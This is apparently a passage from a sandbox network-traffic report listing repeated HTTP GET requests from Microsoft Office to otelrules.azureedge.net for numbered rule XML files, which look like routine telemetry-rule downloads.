              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
